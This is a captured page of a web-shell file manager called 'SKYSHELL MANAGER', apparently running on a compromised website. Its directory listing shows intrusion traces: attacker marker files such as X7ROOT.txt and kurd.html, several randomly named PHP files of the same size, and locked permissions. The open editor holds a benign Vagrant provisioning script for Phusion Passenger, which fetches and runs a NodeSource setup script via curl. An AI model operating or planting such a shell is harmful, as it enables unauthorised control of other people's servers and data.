📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: provision.sh
#!/usr/bin/env bash set -ex set -o pipefail ### Update /etc/hosts if ! grep -q passenger.test /etc/hosts; then cat >>/etc/hosts <<-EOF 127.0.0.1 passenger.test 127.0.0.1 mycook.passenger.test 127.0.0.1 zsfa.passenger.test 127.0.0.1 norails.passenger.test 127.0.0.1 1.passenger.test 2.passenger.test 3.passenger.test 127.0.0.1 4.passenger.test 5.passenger.test 6.passenger.test 127.0.0.1 7.passenger.test 8.passenger.test 9.passenger.test 127.0.0.1 rack.test foobar.test EOF fi ### Preset dpkg # None of the packages to install require interaction, but a couple still expect an available # stdin. With this, they'll know it isn't. export DEBIAN_FRONTEND=noninteractive ### Update keys/certificates apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 7F438280EF8D349F # Puppet apt-get update && apt-get install --reinstall ca-certificates ### Update bashrc and bash profile if ! grep -q bashrc.mine /etc/bash.bashrc; then echo ". /etc/bash.bashrc.mine" >> /etc/bash.bashrc fi if ! grep -q bashrc.mine /home/vagrant/.bashrc; then echo ". /etc/bash.bashrc.mine" >> /home/vagrant/.bashrc fi if ! grep -q /vagrant /home/vagrant/.profile; then echo "if tty -s; then cd /vagrant; fi" >> /home/vagrant/.profile fi cp /vagrant/dev/vagrant/bashrc /etc/bash.bashrc.mine cp /vagrant/dev/vagrant/sudoers.conf /etc/sudoers.d/passenger chmod 440 /etc/sudoers.d/passenger ### Install native dependencies curl -sL https://deb.nodesource.com/setup_lts.x | bash - apt-get update apt-get install -y build-essential git bash-completion ccache wget \ libxml2-dev libxslt1-dev libsqlite3-dev libcurl4-openssl-dev libpcre2-dev \ ruby ruby-dev nodejs npm \ apache2-mpm-worker apache2-threaded-dev ### Install basic gems if [[ ! -e /usr/local/bin/rake ]]; then gem install rake --no-rdoc --no-ri --version="=12.2.1" fi if [[ ! -e /usr/local/bin/rake ]]; then gem install rake --no-rdoc --no-ri fi if [[ ! -e /usr/local/bin/bundler ]]; then gem install bundler --no-rdoc --no-ri --version="=1.15.4" fi ### Install Phusion Passenger development dependencies pushd /vagrant if [[ ! -e ~/.test_deps_installed ]]; then rake test:install_deps SUDO=1 DEPS_TARGET=~/bundle touch ~/.test_deps_installed else bundle install --path ~/bundle fi popd ### Install Nginx source code pushd /home/vagrant if [[ ! -e nginx ]]; then sudo -u vagrant -H git clone -b branches/stable-1.6 https://github.com/nginx/nginx.git fi sudo -u vagrant -H mkdir -p nginx/inst/conf sudo -u vagrant -H cp /vagrant/dev/vagrant/nginx_start nginx/start if [[ ! -e nginx/Rakefile ]]; then sudo -u vagrant -H cp /vagrant/dev/vagrant/nginx_rakefile nginx/Rakefile fi if [[ ! -e nginx/inst/conf/nginx.conf ]]; then sudo -u vagrant -H cp /vagrant/dev/vagrant/nginx.conf nginx/inst/conf/ fi if [[ ! -e nginx/nginx.conf && ! -h nginx/nginx.conf ]]; then sudo -u vagrant -H ln -s inst/conf/nginx.conf nginx/nginx.conf fi if [[ ! -e nginx/access.log && ! -h nginx/access.log ]]; then sudo -u vagrant -H ln -s inst/logs/access.log nginx/access.log fi if [[ ! -e nginx/error.log && ! -h nginx/error.log ]]; then sudo -u vagrant -H ln -s inst/logs/error.log nginx/error.log fi popd ### Set up Apache should_restart_apache=false cp /vagrant/dev/vagrant/apache_ports.conf /etc/apache2/ports.conf cp /vagrant/dev/vagrant/apache_default_site.conf /etc/apache2/sites-available/000-default.conf if [[ ! -e /etc/apache2/mods-available/passenger.conf ]]; then cp /vagrant/dev/vagrant/apache_passenger.conf /etc/apache2/mods-available/passenger.conf fi if [[ ! -e /etc/apache2/mods-available/passenger.load ]]; then cp /vagrant/dev/vagrant/apache_passenger.load /etc/apache2/mods-available/passenger.load fi if [[ ! -e /etc/apache2/sites-available/010-rack.test.conf ]]; then cp /vagrant/dev/vagrant/apache_rack_test.conf /etc/apache2/sites-available/010-rack.test.conf a2ensite 010-rack.test should_restart_apache=true fi if $should_restart_apache; then service apache2 restart fi
Save